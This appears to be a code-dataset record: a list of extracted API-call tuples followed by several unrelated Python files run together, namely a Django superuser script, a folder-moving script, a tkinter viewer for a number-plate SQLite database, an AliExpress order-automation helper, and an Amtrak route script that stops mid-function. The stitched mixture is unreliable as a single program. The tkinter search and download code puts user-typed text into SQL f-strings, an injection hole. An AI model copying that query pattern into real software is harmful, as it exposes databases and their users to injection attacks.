[((643, 661), 'command_args.get_args', 'get_args', (['sys.argv'], {}), '(sys.argv)\n', (651, 661), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((961, 1001), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--cluster"""', '"""3"""'], {}), "(args, '--cluster', '3')\n", (977, 1001), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1014, 1048), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--queue"""'], {}), "(args, '--queue')\n", (1031, 1048), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1126, 1173), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--chaos-mode"""', '"""mixed"""'], {}), "(args, '--chaos-mode', 'mixed')\n", (1142, 1173), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1423, 1522), 'command_args.get_optional_arg_validated', 'get_optional_arg_validated', (['args', '"""--rmq-version"""', '"""3.8-beta"""', "['3.7', '3.8-beta', '3.8-alpha']"], {}), "(args, '--rmq-version', '3.8-beta', ['3.7',\n '3.8-beta', '3.8-alpha'])\n", (1449, 1522), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((705, 739), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--tests"""'], {}), "(args, '--tests')\n", (722, 739), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((759, 795), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--actions"""'], {}), "(args, '--actions')\n", (776, 795), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((821, 866), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--in-flight-max"""', '(10)'], {}), "(args, '--in-flight-max', 10)\n", (837, 866), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((895, 940), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--grace-period-sec"""'], {}), "(args, '--grace-period-sec')\n", (912, 940), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1075, 1107), 'command_args.get_mandatory_arg', 'get_mandatory_arg', (['args', '"""--sac"""'], {}), "(args, '--sac')\n", (1092, 1107), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1203, 1255), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--chaos-min-interval"""', '"""30"""'], {}), "(args, '--chaos-min-interval', '30')\n", (1219, 1255), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1286, 1339), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--chaos-max-interval"""', '"""120"""'], {}), "(args, '--chaos-max-interval', '120')\n", (1302, 1339), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((1360, 1403), 'command_args.get_optional_arg', 'get_optional_arg', (['args', '"""--pre-fetch"""', '"""10"""'], {}), "(args, '--pre-fetch', '10')\n", (1376, 1403), False, 'from command_args import get_args, get_mandatory_arg, get_optional_arg, is_true, get_optional_arg_validated\n'), ((2804, 2818), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (2814, 2818), False, 'import time\n'), ((2842, 2900), 'MessageMonitor.MessageMonitor', 'MessageMonitor', (['"""qqt"""', 'test_number', 'print_mod', '(True)', '(False)'], {}), "('qqt', test_number, print_mod, True, False)\n", (2856, 2900), False, 'from MessageMonitor import MessageMonitor\n'), ((2921, 2999), 'RabbitPublisher.RabbitPublisher', 'RabbitPublisher', (['(1)', 'test_number', 'broker_manager', 'in_flight_max', '(120)', 'print_mod'], {}), '(1, test_number, broker_manager, in_flight_max, 120, print_mod)\n', (2936, 2999), False, 'from RabbitPublisher import RabbitPublisher\n'), ((3096, 3162), 'ConsumerManager.ConsumerManager', 'ConsumerManager', (['broker_manager', 'msg_monitor', '"""TEST RUNNER"""', '(False)'], {}), "(broker_manager, msg_monitor, 'TEST RUNNER', False)\n", (3111, 3162), False, 'from ConsumerManager import ConsumerManager\n'), ((3257, 3285), 'ChaosExecutor.ChaosExecutor', 'ChaosExecutor', (['initial_nodes'], {}), '(initial_nodes)\n', (3270, 3285), False, 'from ChaosExecutor import ChaosExecutor\n'), ((3468, 3521), 'threading.Thread', 'threading.Thread', ([], {'target': 'msg_monitor.process_messages'}), '(target=msg_monitor.process_messages)\n', (3484, 3521), False, 'import threading\n'), ((3627, 3678), 'threading.Thread', 'threading.Thread', ([], {'target': 'publisher.start_publishing'}), '(target=publisher.start_publishing)\n', (3643, 3678), False, 'import threading\n'), ((3714, 3761), 'printer.console_out', 'console_out', (['"""publisher started"""', '"""TEST RUNNER"""'], {}), "('publisher started', 'TEST RUNNER')\n", (3725, 3761), False, 'from printer import console_out\n'), ((4254, 4268), 'time.sleep', 'time.sleep', (['(60)'], {}), '(60)\n', (4264, 4268), False, 'import time\n'), ((4277, 4324), 'printer.console_out', 'console_out', (['"""repairing cluster"""', '"""TEST RUNNER"""'], {}), "('repairing cluster', 'TEST RUNNER')\n", (4288, 4324), False, 'from printer import console_out\n'), ((4356, 4402), 'printer.console_out', 'console_out', (['"""repaired cluster"""', '"""TEST RUNNER"""'], {}), "('repaired cluster', 'TEST RUNNER')\n", (4367, 4402), False, 'from printer import console_out\n'), ((4457, 4533), 'printer.console_out', 'console_out', (['"""starting grace period for consumer to catch up"""', '"""TEST RUNNER"""'], {}), "('starting grace period for consumer to catch up', 'TEST RUNNER')\n", (4468, 4533), False, 'from printer import console_out\n'), ((5130, 5203), 'printer.console_out', 'console_out', (['"""RESULTS------------------------------------"""', '"""TEST RUNNER"""'], {}), "('RESULTS------------------------------------', 'TEST RUNNER')\n", (5141, 5203), False, 'from printer import console_out\n'), ((6021, 6098), 'printer.console_out', 'console_out', (['"""RESULTS END------------------------------------"""', '"""TEST RUNNER"""'], {}), "('RESULTS END------------------------------------', 'TEST RUNNER')\n", (6032, 6098), False, 'from printer import console_out\n'), ((1793, 1808), 'BrokerManager.BrokerManager', 'BrokerManager', ([], {}), '()\n', (1806, 1808), False, 'from BrokerManager import BrokerManager\n'), ((1971, 2032), 'printer.console_out', 'console_out', (['f"""Initial nodes: {initial_nodes}"""', '"""TEST RUNNER"""'], {}), "(f'Initial nodes: {initial_nodes}', 'TEST RUNNER')\n", (1982, 2032), False, 'from printer import console_out\n'), ((3833, 3887), 'random.randint', 'random.randint', (['chaos_min_interval', 'chaos_max_interval'], {}), '(chaos_min_interval, chaos_max_interval)\n', (3847, 3887), False, 'import random\n'), ((3900, 3985), 'printer.console_out', 'console_out', (['f"""waiting for {wait_sec} seconds before next action"""', '"""TEST RUNNER"""'], {}), "(f'waiting for {wait_sec} seconds before next action', 'TEST RUNNER'\n )\n", (3911, 3985), False, 'from printer import console_out\n'), ((3993, 4013), 'time.sleep', 'time.sleep', (['wait_sec'], {}), '(wait_sec)\n', (4003, 4013), False, 'import time\n'), ((4187, 4244), 'subprocess.call', 'subprocess.call', (["['bash', '../cluster/cluster-status.sh']"], {}), "(['bash', '../cluster/cluster-status.sh'])\n", (4202, 4244), False, 'import subprocess\n'), ((4965, 4978), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (4975, 4978), False, 'import time\n'), ((5703, 5767), 'printer.console_out', 'console_out', (['"""FAILED TEST: OUT OF ORDER MESSAGES"""', '"""TEST RUNNER"""'], {}), "('FAILED TEST: OUT OF ORDER MESSAGES', 'TEST RUNNER')\n", (5714, 5767), False, 'from printer import console_out\n'), ((5848, 5904), 'printer.console_out', 'console_out', (['"""FAILED TEST: LOST MESSAGES"""', '"""TEST RUNNER"""'], {}), "('FAILED TEST: LOST MESSAGES', 'TEST RUNNER')\n", (5859, 5904), False, 'from printer import console_out\n'), ((5974, 6011), 'printer.console_out', 'console_out', (['"""TEST OK"""', '"""TEST RUNNER"""'], {}), "('TEST OK', 'TEST RUNNER')\n", (5985, 6011), False, 'from printer import console_out\n'), ((4611, 4634), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4632, 4634), False, 'import datetime\n'), ((5367, 5417), 'printer.console_out', 'console_out', (['f"""Lost message: {msg}"""', '"""TEST RUNNER"""'], {}), "(f'Lost message: {msg}', 'TEST RUNNER')\n", (5378, 5417), False, 'from printer import console_out\n'), ((2781, 2794), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2791, 2794), False, 'import time\n')]
|
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'sigi_op.settings'
import django
django.setup()
from django.contrib.auth.management.commands.createsuperuser import get_user_model
if get_user_model().objects.filter(username='admin'):
print("Super user already created")
else:
get_user_model()._default_manager.db_manager('default').create_superuser(username='admin', email='<EMAIL>', password='<PASSWORD>')
print("Super user created")
|
[
"django.setup",
"django.contrib.auth.management.commands.createsuperuser.get_user_model"
] |
[((82, 96), 'django.setup', 'django.setup', ([], {}), '()\n', (94, 96), False, 'import django\n'), ((184, 200), 'django.contrib.auth.management.commands.createsuperuser.get_user_model', 'get_user_model', ([], {}), '()\n', (198, 200), False, 'from django.contrib.auth.management.commands.createsuperuser import get_user_model\n'), ((286, 302), 'django.contrib.auth.management.commands.createsuperuser.get_user_model', 'get_user_model', ([], {}), '()\n', (300, 302), False, 'from django.contrib.auth.management.commands.createsuperuser import get_user_model\n')]
|
import os, shutil
from distutils.dir_util import copy_tree
import numpy as np
import shutil
path = "dataset"
split_path = "dataset_splits"
all_paths = []
for folder in os.listdir(split_path):
folder_path = os.path.join(split_path, folder)
print(folder_path)
for project_folder in os.listdir(folder_path):
# print(project_folder)
project_folder_path = os.path.join(folder_path, project_folder)
try:
shutil.move(project_folder_path, path)
except Exception as e:
print(e)
|
[
"os.path.join",
"os.listdir",
"shutil.move"
] |
[((171, 193), 'os.listdir', 'os.listdir', (['split_path'], {}), '(split_path)\n', (181, 193), False, 'import os, shutil\n'), ((210, 242), 'os.path.join', 'os.path.join', (['split_path', 'folder'], {}), '(split_path, folder)\n', (222, 242), False, 'import os, shutil\n'), ((286, 309), 'os.listdir', 'os.listdir', (['folder_path'], {}), '(folder_path)\n', (296, 309), False, 'import os, shutil\n'), ((361, 402), 'os.path.join', 'os.path.join', (['folder_path', 'project_folder'], {}), '(folder_path, project_folder)\n', (373, 402), False, 'import os, shutil\n'), ((413, 451), 'shutil.move', 'shutil.move', (['project_folder_path', 'path'], {}), '(project_folder_path, path)\n', (424, 451), False, 'import shutil\n')]
|
import os
import sqlite3
from tkinter import *
from tkinter import simpledialog
from tkinter import ttk
from PIL import Image, ImageTk
from DetailsPage import DetailsPage
import constants
from datetime import datetime
import tkinter.filedialog
from tkinter import messagebox
import xlwt
class HistoryPage(Frame):
def __init__(self, master):
Frame.__init__(self, master, padx=20, bg=constants.colors['main']['bg'])
self.grid(row=1, column=1)
self.style = ttk.Style()
self.style.map('TCombobox', fieldbackground=[('readonly', 'gray90')])
self.style.map('TCombobox', selectbackground=[('readonly', 'gray90')])
self.style.map('TCombobox', selectforeground=[('readonly', 'black')])
self.style.map('Treeview', background=[('selected', 'gray70')])
self.searchBar()
self.dbtable()
self.downloadBar()
# connect database
cwd = os.getcwd()
parDir = cwd.replace('tkinterUI', 'realtest.db')
self.db = sqlite3.connect(parDir)
self.cur = self.db.cursor()
self.cur.execute("SELECT rowid,* FROM realtest")
self.searchedEntries = self.entries = self.cur.fetchall()
self.resetTree()
# resizable
self.rowconfigure(1, weight=1)
self.columnconfigure(0, weight=1)
self.columnconfigure(1, weight=1)
self.columnconfigure(2, weight=1)
self.columnconfigure(3, weight=1)
self.columnconfigure(4, weight=1)
def __del__(self):
self.db.commit()
self.db.close()
def searchBar(self):
# First Row (search)
self.searchby = StringVar(value='Reg. Number')
self.entryVar = StringVar(value='Enter Query')
searchComboVals = ('Reg. Number','Date','Time','Vehicle','Address',)
label = Label(self, text='Search by ', padx=10, pady=10)
comboBox = ttk.Combobox(self, textvariable=self.searchby, state="readonly", justify='center')
comboBox['values'] = searchComboVals
entryBox = ttk.Entry(self, textvariable=self.entryVar, width=40, justify='center')
searchBut = ttk.Button(self, text='Search', command=self.searchTree)
resetButton = ttk.Button(self, text='Reset', command=self.resetTree)
entryBox.bind('<Button-1>', self.OnSingleClickEntry)
entryBox.bind("<Return>",lambda _:self.searchTree())
comboBox.bind("<FocusIn>", lambda _: comboBox.selection_range(0, 0))
comboBox.current(0)
# grid
label.grid(row=0, column=0, sticky=N + E + S + W, pady=(15, 2), padx=(0, 2))
comboBox.grid(row=0, column=1, sticky=N + E + S + W, pady=(15, 2), padx=2)
entryBox.grid(row=0, column=2, sticky=N + E + S + W, pady=(15, 2), padx=2)
searchBut.grid(row=0, column=3, sticky=N + E + S + W, pady=(15, 2), padx=2)
resetButton.grid(row=0, column=4, sticky=N + E + S + W, pady=(15, 2), padx=(2, 0))
def dbtable(self):
# treeview
self.table = ttk.Treeview(self, height=30, selectmode='browse')
verscrlbar = ttk.Scrollbar(self, orient="vertical", command=self.table.yview)
self.table.configure(xscrollcommand=verscrlbar.set)
self.table["columns"] = ("1", "2", "3", "4", "5")
self.table['show'] = 'headings'
self.table.column("1", width=30, anchor='c')
self.table.column("2", width=120, anchor='c')
self.table.column("3", width=220, anchor='c')
self.table.column("4", width=230, anchor='c')
self.table.column("5", width=300, anchor='c')
# Assigning the heading names to the
# respective columns
self.table.heading("1", text="Id")
self.table.heading("2", text="Number")
self.table.heading("3", text="TimeStamp")
self.table.heading("4", text="Vehicle")
self.table.heading("5", text="Address")
self.table.bind("<Double-1>", self.OnDoubleClick)
self.table.grid(row=1, column=0, columnspan=5, sticky=N + E + S + W)
verscrlbar.grid(row=1, column=5, sticky=N + E + S + W)
def downloadBar(self):
# download frame
downloadFrame = Frame(self, bg=constants.colors['main']['bg'])
self.downloadType = StringVar(value='Number Plate Image')
self.downloadWhat = StringVar(value='Selected Row')
downloadLabel = Label(downloadFrame, text='Download the ', padx=10, pady=10)
downCombo = ttk.Combobox(downloadFrame, textvariable=self.downloadType, state="readonly", justify='center')
downCombo['values'] = ('Number Plate Image','Captured Image','Data as Excel')
downCombo.current(0)
ofLabel = Label(downloadFrame, text=' of ', padx=10, pady=10)
whatCombo = ttk.Combobox(downloadFrame, textvariable=self.downloadWhat, state="readonly", justify='center')
whatCombo['values'] = ('Selected Row','Searched Rows','All Rows',)
whatCombo.current(0)
downloadBut = ttk.Button(downloadFrame, text='Download', command=self.download)
downCombo.bind("<FocusIn>", lambda _: downCombo.selection_range(0, 0))
whatCombo.bind("<FocusIn>", lambda _: whatCombo.selection_range(0, 0))
# pack
downloadLabel.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=(0, 2))
downCombo.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=2)
ofLabel.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=2)
whatCombo.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=2)
downloadBut.pack(side=LEFT, fill=X, expand=True, pady=(2, 2), padx=(2, 0))
downloadFrame.grid(row=2, column=0, columnspan=5, sticky=N + E + S + W, pady=(2, 15), padx=(2, 2))
def OnSingleClickEntry(self, event):
if self.entryVar.get() == 'Enter Query':
self.entryVar.set('')
def OnDoubleClick(self, event):
id = self.table.selection()[0]
DetailsPage(self.master, id=id, cur=self.cur)
def updateTable(self, entries):
self.table.delete(*self.table.get_children())
self.table.tag_configure('odd',background='gray90')
self.table.tag_configure('even', background='snow')
FirstWhite = 0 if len(entries)%2 == 0 else 1
for entry in reversed(entries):
self.table.insert("", 'end', text="", iid=entry[0], values=(
entry[0], entry[1], entry[2], entry[3],
entry[4]), tags = ('even',) if entry[0]%2 == FirstWhite else ('odd',))
# resets tree to full data
resetTree = lambda self: self.updateTable(entries=self.entries)
def searchTree(self):
# searches and updates table
columnMap = {
'Vehicle': 'name',
'Reg. Number': 'numPlate',
'Date': 'timeStamp',
'Time': 'timeStamp',
'Address': 'address',
}
column = self.searchby.get()
query = self.entryVar.get()
if column == 'Time':
query = f"SELECT rowid,* FROM realtest WHERE {columnMap[column]} LIKE '{query}% | %'"
elif column == 'Date':
query = f"SELECT rowid,* FROM realtest WHERE {columnMap[column]} LIKE '% | {query}%'"
else:
query = f"SELECT rowid,* FROM realtest WHERE {columnMap[column]} LIKE '%{query}%'"
self.cur.execute(query)
self.searchedEntries = self.cur.fetchall()
self.updateTable(entries=self.searchedEntries)
def download(self):
# ifelse for selecting the number of rows to download
if self.downloadWhat.get() == 'Selected Row':
id = self.table.selection()
if not id :
tkinter.messagebox.showerror(title='Row Selection Expected', message='No Row Selected')
return None
self.cur.execute(f"SELECT rowid,* FROM realtest WHERE rowid = {int(id[0])}")
dList = [self.cur.fetchone()]
elif self.downloadWhat.get() == 'All Rows' :
dList = self.entries
else:#Searched Row
dList = self.searchedEntries
# ask save location
dirname = tkinter.filedialog.askdirectory(parent=self, initialdir="/",title='Please select location to save file ')
if not dirname:
return
# excel save code
if self.downloadType.get() == 'Data as Excel':
# ask for file name to save
fileName = simpledialog.askstring(title="Excel File Name",
prompt="Enter the name to save the excel file :")
if not fileName:
return
excel = xlwt.Workbook()
sheet = excel.add_sheet("VInLP export", datetime.now())
style = xlwt.easyxf('font: bold 1, color blue; borders: left thick, right thin, top thin, bottom thin; pattern: pattern solid, fore_color white;')
tl = xlwt.easyxf('font: bold 1, color blue; border: left thick, top thick, right thin, bottom thick')
t = xlwt.easyxf('font: bold 1, color blue; border: left thin, top thick, right thin, bottom thick')
tr = xlwt.easyxf('font: bold 1, color blue; border: left thin, top thick, right thick, bottom thick')
r = xlwt.easyxf('border: left thin,right thick')
br = xlwt.easyxf('border: left thin, right thick, bottom thick')
b = xlwt.easyxf('border: left thin,right thin, bottom thick')
bl = xlwt.easyxf('border: left thick, right thin, bottom thick')
l = xlwt.easyxf('border: left thick,right thin')
m = xlwt.easyxf('border: left thin,right thin')
sheet.write(0, 0, 'Id', tl)
sheet.write(0, 1, 'Registration Number', t)
sheet.write(0, 2, 'Date', t)
sheet.write(0, 3, 'Time', t)
sheet.write(0, 4, 'Vehicle', t)
sheet.write(0, 5, 'Address', tr)
sheet.col(0).width = int(4 * 260)
sheet.col(1).width = int(17 * 260)
sheet.col(2).width = int(11 * 260)
sheet.col(3).width = int(12 * 260)
sheet.col(4).width = int(30 * 260)
sheet.col(5).width = int(35 * 260)
sheet.write(1, 0, '', l)
sheet.write(1, 1, '', m)
sheet.write(1, 2, '', m)
sheet.write(1, 3, '', m)
sheet.write(1, 4, '', m)
sheet.write(1, 5, '', r)
for index, row in enumerate(dList):
time, date = row[2].split(' | ')
sheet.write(index+2, 0, row[0], l)
sheet.write(index+2, 1, row[1], m)
sheet.write(index+2, 2, date, m)
sheet.write(index+2, 3, time, m)
sheet.write(index+2, 4, row[3], m)
sheet.write(index+2, 5, row[4], r)
index = len(dList) + 1
sheet.write(index, 0,style=bl)
sheet.write(index, 1, style=b)
sheet.write(index, 2, style=b)
sheet.write(index, 3, style=b)
sheet.write(index, 4, style=b)
sheet.write(index, 5, style=br)
excel.save(f'{dirname}/{fileName}.xls')
# saving images
else:
for row in dList:
print(row[0])
with open(f'{dirname}/{row[1]}.png', 'wb') as file:
file.write(row[6] if self.downloadType.get() == 'Captured Image' else row[7])
|
[
"DetailsPage.DetailsPage",
"tkinter.ttk.Entry",
"xlwt.Workbook",
"tkinter.ttk.Scrollbar",
"os.getcwd",
"xlwt.easyxf",
"tkinter.ttk.Style",
"tkinter.ttk.Combobox",
"tkinter.simpledialog.askstring",
"sqlite3.connect",
"tkinter.ttk.Treeview",
"tkinter.ttk.Button",
"datetime.datetime.now"
] |
[((504, 515), 'tkinter.ttk.Style', 'ttk.Style', ([], {}), '()\n', (513, 515), False, 'from tkinter import ttk\n'), ((952, 963), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (961, 963), False, 'import os\n'), ((1041, 1064), 'sqlite3.connect', 'sqlite3.connect', (['parDir'], {}), '(parDir)\n', (1056, 1064), False, 'import sqlite3\n'), ((1944, 2031), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['self'], {'textvariable': 'self.searchby', 'state': '"""readonly"""', 'justify': '"""center"""'}), "(self, textvariable=self.searchby, state='readonly', justify=\n 'center')\n", (1956, 2031), False, 'from tkinter import ttk\n'), ((2093, 2164), 'tkinter.ttk.Entry', 'ttk.Entry', (['self'], {'textvariable': 'self.entryVar', 'width': '(40)', 'justify': '"""center"""'}), "(self, textvariable=self.entryVar, width=40, justify='center')\n", (2102, 2164), False, 'from tkinter import ttk\n'), ((2186, 2242), 'tkinter.ttk.Button', 'ttk.Button', (['self'], {'text': '"""Search"""', 'command': 'self.searchTree'}), "(self, text='Search', command=self.searchTree)\n", (2196, 2242), False, 'from tkinter import ttk\n'), ((2266, 2320), 'tkinter.ttk.Button', 'ttk.Button', (['self'], {'text': '"""Reset"""', 'command': 'self.resetTree'}), "(self, text='Reset', command=self.resetTree)\n", (2276, 2320), False, 'from tkinter import ttk\n'), ((3071, 3121), 'tkinter.ttk.Treeview', 'ttk.Treeview', (['self'], {'height': '(30)', 'selectmode': '"""browse"""'}), "(self, height=30, selectmode='browse')\n", (3083, 3121), False, 'from tkinter import ttk\n'), ((3146, 3210), 'tkinter.ttk.Scrollbar', 'ttk.Scrollbar', (['self'], {'orient': '"""vertical"""', 'command': 'self.table.yview'}), "(self, orient='vertical', command=self.table.yview)\n", (3159, 3210), False, 'from tkinter import ttk\n'), ((4541, 4641), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['downloadFrame'], {'textvariable': 'self.downloadType', 'state': '"""readonly"""', 'justify': '"""center"""'}), "(downloadFrame, textvariable=self.downloadType, state=\n 'readonly', justify='center')\n", (4553, 4641), False, 'from tkinter import ttk\n'), ((4850, 4950), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['downloadFrame'], {'textvariable': 'self.downloadWhat', 'state': '"""readonly"""', 'justify': '"""center"""'}), "(downloadFrame, textvariable=self.downloadWhat, state=\n 'readonly', justify='center')\n", (4862, 4950), False, 'from tkinter import ttk\n'), ((5077, 5142), 'tkinter.ttk.Button', 'ttk.Button', (['downloadFrame'], {'text': '"""Download"""', 'command': 'self.download'}), "(downloadFrame, text='Download', command=self.download)\n", (5087, 5142), False, 'from tkinter import ttk\n'), ((6049, 6094), 'DetailsPage.DetailsPage', 'DetailsPage', (['self.master'], {'id': 'id', 'cur': 'self.cur'}), '(self.master, id=id, cur=self.cur)\n', (6060, 6094), False, 'from DetailsPage import DetailsPage\n'), ((8580, 8682), 'tkinter.simpledialog.askstring', 'simpledialog.askstring', ([], {'title': '"""Excel File Name"""', 'prompt': '"""Enter the name to save the excel file :"""'}), "(title='Excel File Name', prompt=\n 'Enter the name to save the excel file :')\n", (8602, 8682), False, 'from tkinter import simpledialog\n'), ((8802, 8817), 'xlwt.Workbook', 'xlwt.Workbook', ([], {}), '()\n', (8815, 8817), False, 'import xlwt\n'), ((8908, 9056), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; borders: left thick, right thin, top thin, bottom thin; pattern: pattern solid, fore_color white;"""'], {}), "(\n 'font: bold 1, color blue; borders: left thick, right thin, top thin, bottom thin; pattern: pattern solid, fore_color white;'\n )\n", (8919, 9056), False, 'import xlwt\n'), ((9068, 9174), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; border: left thick, top thick, right thin, bottom thick"""'], {}), "(\n 'font: bold 1, color blue; border: left thick, top thick, right thin, bottom thick'\n )\n", (9079, 9174), False, 'import xlwt\n'), ((9183, 9288), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; border: left thin, top thick, right thin, bottom thick"""'], {}), "(\n 'font: bold 1, color blue; border: left thin, top thick, right thin, bottom thick'\n )\n", (9194, 9288), False, 'import xlwt\n'), ((9298, 9404), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; border: left thin, top thick, right thick, bottom thick"""'], {}), "(\n 'font: bold 1, color blue; border: left thin, top thick, right thick, bottom thick'\n )\n", (9309, 9404), False, 'import xlwt\n'), ((9413, 9457), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin,right thick"""'], {}), "('border: left thin,right thick')\n", (9424, 9457), False, 'import xlwt\n'), ((9477, 9536), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin, right thick, bottom thick"""'], {}), "('border: left thin, right thick, bottom thick')\n", (9488, 9536), False, 'import xlwt\n'), ((9555, 9612), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin,right thin, bottom thick"""'], {}), "('border: left thin,right thin, bottom thick')\n", (9566, 9612), False, 'import xlwt\n'), ((9632, 9691), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thick, right thin, bottom thick"""'], {}), "('border: left thick, right thin, bottom thick')\n", (9643, 9691), False, 'import xlwt\n'), ((9710, 9754), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thick,right thin"""'], {}), "('border: left thick,right thin')\n", (9721, 9754), False, 'import xlwt\n'), ((9773, 9816), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin,right thin"""'], {}), "('border: left thin,right thin')\n", (9784, 9816), False, 'import xlwt\n'), ((8871, 8885), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (8883, 8885), False, 'from datetime import datetime\n')]
|
from core import run_casper,save_db,load_db
from datetime import datetime,timedelta
import logging
log = logging.getLogger('ali-module')
list_js="ali/get_order_list.js"
order_js="ali/get_order.js"
confirm_js="ali/confirm_order.js"
login_js="ali/login.js"
order_url="http://trade.aliexpress.com/order_detail.htm?orderId=%s"
def get_order_list(full=False):
if not full: ret = run_casper (list_js)
else: ret = run_casper (list_js,["full"])
return ret
def get_order(ident):
""" calculate for an order
"payment-time": "2014-07-11 01:32:35",
"protection-reminder": {
"hours": 3,
"days": 14,
"seconds": 50,
"minutes": 50
},
run_casper raises exception if get_order failed.
"""
ret = run_casper(order_js,[ident])
rem = ret['protection-reminder']
if rem:
now=datetime.now()
#payment_time=datetime.strptime(ret["payment-time"],"%Y-%m-%d %H:%M:%S")
prot_secs=rem["hours"]*60*60+rem["minutes"]*60+rem["seconds"]
protection_timeout = timedelta(days=rem["days"],seconds=prot_secs)
ret['protection-timeout'] = (datetime.now()+protection_timeout).strftime("%Y-%m-%d %H:%M:%S")
del(ret['protection-reminder'])
ret['type']='aliexpress'
return ret
def get_order_link(ident):
return order_url % (ident)
def confirm_order(ident):
try:
log.info("confirm order status: %s" %run_casper(confirm_js,[ident]))
except Exception as e:
log.error("could not confirm order %s"%ident)
log.error(e)
raise
def login():
return run_casper(login_js,[])
|
[
"datetime.timedelta",
"datetime.datetime.now",
"core.run_casper",
"logging.getLogger"
] |
[((106, 137), 'logging.getLogger', 'logging.getLogger', (['"""ali-module"""'], {}), "('ali-module')\n", (123, 137), False, 'import logging\n'), ((789, 818), 'core.run_casper', 'run_casper', (['order_js', '[ident]'], {}), '(order_js, [ident])\n', (799, 818), False, 'from core import run_casper, save_db, load_db\n'), ((1616, 1640), 'core.run_casper', 'run_casper', (['login_js', '[]'], {}), '(login_js, [])\n', (1626, 1640), False, 'from core import run_casper, save_db, load_db\n'), ((381, 400), 'core.run_casper', 'run_casper', (['list_js'], {}), '(list_js)\n', (391, 400), False, 'from core import run_casper, save_db, load_db\n'), ((425, 454), 'core.run_casper', 'run_casper', (['list_js', "['full']"], {}), "(list_js, ['full'])\n", (435, 454), False, 'from core import run_casper, save_db, load_db\n'), ((880, 894), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (892, 894), False, 'from datetime import datetime, timedelta\n'), ((1075, 1121), 'datetime.timedelta', 'timedelta', ([], {'days': "rem['days']", 'seconds': 'prot_secs'}), "(days=rem['days'], seconds=prot_secs)\n", (1084, 1121), False, 'from datetime import datetime, timedelta\n'), ((1443, 1474), 'core.run_casper', 'run_casper', (['confirm_js', '[ident]'], {}), '(confirm_js, [ident])\n', (1453, 1474), False, 'from core import run_casper, save_db, load_db\n'), ((1158, 1172), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1170, 1172), False, 'from datetime import datetime, timedelta\n')]
|
#Amtrak Recursive ROute Writer (ARROW)
#cont- does not write initial .npz file, relies on existing partials
def main(newdata=False,
cont=False,
newredund=False,
arrive=True):
import json
import numpy as np
import os
import route_builder
import glob
import find_redundancy
local = 'F:/Python34/America_By_Train/'
rb = local+'route_builder/'
direc = 'C:/Users/Owner/Documents/GitHub/capecchi.github.io/posts/AmericaByTrain/'
if newdata or not os.path.isfile(local+'endpts.npz'):
with open(direc+'amtrak.geojson') as f:
data = json.load(f)
feats = data['features']
index = np.arange(len(feats))
strt = []
end = []
for i in index:
cc = feats[i]['geometry']['coordinates']
strt.append(cc[0])
end.append(cc[-1])
#NEED route GPS endpoints to look for
fcoords = local
#fraarcid
stpaulid = 182592 #keep east pt
stpaul_iarr_cid = 182614 #mark eastern segment as redundant so we only search west
portland_cid = 266301 #block southern route to Portland
seattleid = 241310 #keep south pt
laid = 211793 #keep south pt
palmspringsid = 263261 #keep west pt
neworleansid_end = 178659 #keep east pt NOTE does not connect to neworleans_start
neworleansid_start = 243859 #keep south or east pt
phillyid = 204870 #keep north pt
dcid = 164103 #keep south pt
chicagoid = 253079 #keep north pt
eb_block = np.array([],dtype=int)
cs_block = np.array([],dtype=int)
sl_block = np.array([],dtype=int)
